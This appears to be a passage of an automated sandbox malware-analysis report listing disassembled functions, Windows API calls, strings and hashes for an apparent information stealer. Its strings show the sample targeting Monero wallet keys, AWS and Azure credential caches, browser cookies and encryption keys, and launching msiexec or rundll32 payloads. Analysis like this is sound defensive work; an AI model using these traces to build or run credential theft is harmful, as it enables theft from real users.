                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 8755d641a8fab9e0e5ed35c663d20859ddee6d049bed9c75cf9f22a7479a88a2
                                  • Instruction ID: 0e48ad706a2e1703498dcf12772356a6361b6f205688c2807596465af38936a6
                                  • Opcode Fuzzy Hash: 8755d641a8fab9e0e5ed35c663d20859ddee6d049bed9c75cf9f22a7479a88a2
                                  • Instruction Fuzzy Hash: 3612EEB1965118FBCB25EBA4DCA9FEEB379BF14710F004199F106620D1EF742A88CB65
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0070D083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0070D1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0070D1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D308
                                  • lstrcat.KERNEL32(?,00721570), ref: 0070D317
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D32A
                                  • lstrcat.KERNEL32(?,00721574), ref: 0070D339
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D34C
                                  • lstrcat.KERNEL32(?,00721578), ref: 0070D35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D36E
                                  • lstrcat.KERNEL32(?,0072157C), ref: 0070D37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D390
                                  • lstrcat.KERNEL32(?,00721580), ref: 0070D39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D3B2
                                  • lstrcat.KERNEL32(?,00721584), ref: 0070D3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070D3D4
                                  • lstrcat.KERNEL32(?,00721588), ref: 0070D3E3
                                    • Part of subcall function 0071AB30: lstrlen.KERNEL32(00704F55,?,?,00704F55,00720DDF), ref: 0071AB3B
                                    • Part of subcall function 0071AB30: lstrcpy.KERNEL32(00720DDF,00000000), ref: 0071AB95
                                  • lstrlen.KERNEL32(?), ref: 0070D42A
                                  • lstrlen.KERNEL32(?), ref: 0070D439
                                    • Part of subcall function 0071AD80: StrCmpCA.SHLWAPI(00000000,00721568,0070D2A2,00721568,00000000), ref: 0071AD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0070D4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 267b36365ac717ae6958b15ddecaf6e1fa1e8738566704a3bc73d7e5ebbda375
                                  • Instruction ID: 84b5332a403b4c9187314b363ed3a9cacb2ee95d0632f46d28131f7f6fc3a441
                                  • Opcode Fuzzy Hash: 267b36365ac717ae6958b15ddecaf6e1fa1e8738566704a3bc73d7e5ebbda375
                                  • Instruction Fuzzy Hash: 45E152B1A55118FBCB14EBE4ED5AEEEB379AF14301F004155F106760E1EE38AE88CB61
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011DD490,00000000,?,00721544,00000000,?,?), ref: 0070CB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0070CB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0070CB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0070CBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0070CBD9
                                  • StrStrA.SHLWAPI(?,011DD238,00720B56), ref: 0070CBF7
                                  • StrStrA.SHLWAPI(00000000,011DD4A8), ref: 0070CC1E
                                  • StrStrA.SHLWAPI(?,011DD968,00000000,?,00721550,00000000,?,00000000,00000000,?,011D9230,00000000,?,0072154C,00000000,?), ref: 0070CDA2
                                  • StrStrA.SHLWAPI(00000000,011DD808), ref: 0070CDB9
                                    • Part of subcall function 0070C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0070C971
                                    • Part of subcall function 0070C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0070C97C
                                  • StrStrA.SHLWAPI(?,011DD808,00000000,?,00721554,00000000,?,00000000,011D9200), ref: 0070CE5A
                                  • StrStrA.SHLWAPI(00000000,011D8F30), ref: 0070CE71
                                    • Part of subcall function 0070C920: lstrcat.KERNEL32(?,00720B47), ref: 0070CA43
                                    • Part of subcall function 0070C920: lstrcat.KERNEL32(?,00720B4B), ref: 0070CA57
                                    • Part of subcall function 0070C920: lstrcat.KERNEL32(?,00720B4E), ref: 0070CA78
                                  • lstrlen.KERNEL32(00000000), ref: 0070CF44
                                  • CloseHandle.KERNEL32(00000000), ref: 0070CF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 541afdd493b5bb18d980f6758eb2fdc27e871ae9ae7772c3e0524aa9db6f8ec5
                                  • Instruction ID: e933c00712dd7092ca64ef82ec07b5317fdd124b16acb7f651d419b5d9167e86
                                  • Opcode Fuzzy Hash: 541afdd493b5bb18d980f6758eb2fdc27e871ae9ae7772c3e0524aa9db6f8ec5
                                  • Instruction Fuzzy Hash: 21E11DB1915108FBCB14EBA8DCA6FEEB779AF14310F004199F106631D1EF386A89CB65
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,011DB3F0,00000000,00020019,00000000,007205BE), ref: 00718534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007185B6
                                  • wsprintfA.USER32 ref: 007185E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0071860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0071861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00718629
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007191FC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: `dqF$`dqF$image/jpeg
                                  • API String ID: 2244384528-3864370273
                                  APIs
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00715000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 0071501D
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714B7C
                                    • Part of subcall function 00714B60: FindFirstFileA.KERNEL32(?,?), ref: 00714B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 007150A9
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC4), ref: 00714BC1
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC8), ref: 00714BD7
                                    • Part of subcall function 00714B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00714DCD
                                    • Part of subcall function 00714B60: FindClose.KERNEL32(000000FF), ref: 00714DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00715118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00715135
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714C00
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,007208D3), ref: 00714C15
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714C32
                                    • Part of subcall function 00714B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00714C6E
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,011DE880), ref: 00714C9A
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,00720FE0), ref: 00714CAC
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,?), ref: 00714CC0
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,00720FE4), ref: 00714CD2
                                    • Part of subcall function 00714B60: lstrcat.KERNEL32(?,?), ref: 00714CE6
                                    • Part of subcall function 00714B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00714CFC
                                    • Part of subcall function 00714B60: DeleteFileA.KERNEL32(?), ref: 00714D81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00713415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007135AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0071373A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  APIs
                                    • Part of subcall function 00709A50: InternetOpenA.WININET(00720AF6,00000001,00000000,00000000,00000000), ref: 00709A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 00709CAF
                                  • lstrcat.KERNEL32(?,007212C4), ref: 00709CC1
                                  • lstrcat.KERNEL32(?,?), ref: 00709CD5
                                  • lstrcat.KERNEL32(?,007212C8), ref: 00709CE7
                                  • lstrcat.KERNEL32(?,?), ref: 00709CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 00709D0D
                                  • lstrlen.KERNEL32(00000000), ref: 00709D17
                                  • lstrlen.KERNEL32(00000000), ref: 00709D26
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 007062D0: InternetOpenA.WININET(00720DFF,00000001,00000000,00000000,00000000), ref: 00706331
                                    • Part of subcall function 007062D0: StrCmpCA.SHLWAPI(?,011DE920), ref: 00706353
                                    • Part of subcall function 007062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706385
                                    • Part of subcall function 007062D0: HttpOpenRequestA.WININET(00000000,GET,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 007063D5
                                    • Part of subcall function 007062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0070640F
                                    • Part of subcall function 007062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706421
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00715568
                                  • lstrlen.KERNEL32(00000000), ref: 0071557F
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 007155B4
                                  • lstrlen.KERNEL32(00000000), ref: 007155D3
                                  • lstrlen.KERNEL32(00000000), ref: 007155FE
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  APIs
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071453C
                                  • lstrcat.KERNEL32(?,011DE560), ref: 0071455B
                                  • lstrcat.KERNEL32(?,?), ref: 0071456F
                                  • lstrcat.KERNEL32(?,011DD3B8), ref: 00714583
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00718F20: GetFileAttributesA.KERNEL32(00000000,?,00701B94,?,?,0072577C,?,?,00720E22), ref: 00718F2F
                                    • Part of subcall function 0070A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0070A489
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00719550: GlobalAlloc.KERNEL32(00000000,0071462D,0071462D), ref: 00719563
                                  • StrStrA.SHLWAPI(?,011DE308), ref: 00714643
                                  • GlobalFree.KERNEL32(?), ref: 00714762
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
                                    • Part of subcall function 0070A210: LocalAlloc.KERNEL32(00000040,?,?,?,00704F3E,00000000,?), ref: 0070A251
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A27A
                                    • Part of subcall function 0070A210: LocalFree.KERNEL32(?,?,?,?,00704F3E,00000000,?), ref: 0070A28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007146F3
                                  • StrCmpCA.SHLWAPI(?,007208D2), ref: 00714710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00714722
                                  • lstrcat.KERNEL32(00000000,?), ref: 00714735
                                  • lstrcat.KERNEL32(00000000,00720FA0), ref: 00714744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: db01822afd7a508f2b647d3d6c54d349e313af7b4e66f8abf02dac011edb721e
                                  • Instruction ID: 45759b3c77e56fc4039075f0dbef430829aee80e5119c1569a1867e02d9c074e
                                  • Opcode Fuzzy Hash: db01822afd7a508f2b647d3d6c54d349e313af7b4e66f8abf02dac011edb721e
                                  • Instruction Fuzzy Hash: 3D7166B6914218FBDB14EBA4DD99FEE7379AB88300F004599F605A61C1EB38DB84CF51
                                  APIs
                                    • Part of subcall function 007012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007012B4
                                    • Part of subcall function 007012A0: RtlAllocateHeap.NTDLL(00000000), ref: 007012BB
                                    • Part of subcall function 007012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007012D7
                                    • Part of subcall function 007012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007012F5
                                    • Part of subcall function 007012A0: RegCloseKey.ADVAPI32(?), ref: 007012FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0070134F
                                  • lstrlen.KERNEL32(?), ref: 0070135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00701377
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 00718CF0: GetSystemTime.KERNEL32(00720E1B,011DA4D8,007205B6,?,?,007013F9,?,0000001A,00720E1B,00000000,?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 00718D16
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00701465
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 007014EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: aaa88125bf39fe1d0748b9aec8a7eea2ddf6b708e0e6c2f33a624751820bcd28
                                  • Instruction ID: 1a1ccbf10c3ee812b8039df8a8ac3527b53f295ebcc19cb840a649a4dff76ed4
                                  • Opcode Fuzzy Hash: aaa88125bf39fe1d0748b9aec8a7eea2ddf6b708e0e6c2f33a624751820bcd28
